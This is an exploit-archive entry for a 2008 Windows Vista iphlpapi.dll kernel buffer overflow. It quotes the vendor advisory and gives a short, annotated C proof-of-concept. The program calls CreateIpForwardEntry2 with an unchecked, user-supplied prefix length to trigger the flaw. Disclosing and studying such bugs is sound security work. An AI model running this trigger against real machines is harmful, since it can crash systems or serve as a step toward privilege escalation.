Microsoft Windows Vista - 'iphlpapi.dll' Local Kernel Buffer Overflow

EDB-ID:

32590




Platform:

Windows

Date:

2008-11-19


// source: https://www.securityfocus.com/bid/32357/info

// Microsoft Windows Vista is prone to a buffer-overflow vulnerability because of insufficient boundary checks.

// Local attackers could exploit this issue to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to execute arbitrary code with SYSTEM-level privileges, but this has not been confirmed.

// Windows Vista SP1 is vulnerable to this issue.

// UPDATE (November 25, 2008): Since this issue may be exploitable only by members of the administrative group, the security implication of this issue may be negated. 

#define _WIN32_WINNT 0x0600
#define WIN32_LEAN_AND_MEAN

#include <windows.h>
#include <winsock2.h>
#include <ws2ipdef.h>
#include <iphlpapi.h>

#include <stdio.h>
#include <stdlib.h>

/*
 * Proof-of-concept driver for the advisory quoted in the comments above.
 *
 * Reads an interface index and a destination prefix length from the
 * command line, fills a MIB_IPFORWARD_ROW2 for the fixed IPv4 destination
 * 1.2.3.0 via next hop 11.22.33.44, and hands it to CreateIpForwardEntry2.
 * The prefix length is passed through unchecked; for an IPv4 destination
 * the only meaningful values are 0..32, and an out-of-range value is
 * presumably what exercises the missing boundary check the advisory
 * describes (the kernel-side handling is not visible from this file).
 *
 * Per the update note above, adding a route requires membership in the
 * Administrators group, so the affected code path is reached only from an
 * already-privileged context; the mitigation is the vendor update.
 *
 * Returns the status from CreateIpForwardEntry2 (0 on success, otherwise
 * a Win32 error code, narrowed from DWORD to int), or -1 on bad usage.
 */
int main(int argc, char** argv)
{
        DWORD                      dwStatus;   /* result of CreateIpForwardEntry2 */
        MIB_IPFORWARD_ROW2 route;              /* route being created */
        
        /* Exactly two arguments are expected: <ifNum> <numOfBits>. */
        if (argc != 3)
        {
                printf("Usage: %s <ifNum> <numOfBits>\n\n", argv[0]);
                return -1;
        }

        /* Fill the row with the API's defaults before overriding fields below. */
        InitializeIpForwardEntry(&route);       

        /* atoi() reports no errors: non-numeric input silently becomes 0. */
        route.InterfaceIndex = atoi(argv[1]);
        route.DestinationPrefix.Prefix.si_family = AF_INET;

        /* Fixed destination network; inet_addr() on a constant literal. */
        route.DestinationPrefix.Prefix.Ipv4.sin_addr.s_addr = inet_addr("1.2.3.0");     
        route.DestinationPrefix.Prefix.Ipv4.sin_family = AF_INET;

        /* Taken verbatim from argv with no check that it lies in 0..32 for
         * an IPv4 prefix. This is the user-controlled value the advisory
         * concerns; a hardened implementation would reject it before use. */
        route.DestinationPrefix.PrefixLength = atoi(argv[2]);
        
        /* Fixed next hop, again from a constant literal. */
        route.NextHop.Ipv4.sin_addr.s_addr = inet_addr("11.22.33.44");  
        route.NextHop.Ipv4.sin_family       = AF_INET;

        route.SitePrefixLength          = 0;

        /* Static route: NETMGMT protocol, manual origin, lifetimes of
         * 0xffffffff (the API's "infinite"), metric 1. */
        route.Protocol                  = MIB_IPPROTO_NETMGMT;          
        route.Origin                            = NlroManual;
        route.ValidLifetime             = 0xffffffff;
        route.PreferredLifetime         = 0xffffffff;
        route.Metric                            = 1;
        
        /* The status is propagated to the shell unchanged; nothing here
         * distinguishes "route created" from "request rejected". */
        dwStatus = CreateIpForwardEntry2(&route); 
        return dwStatus;
}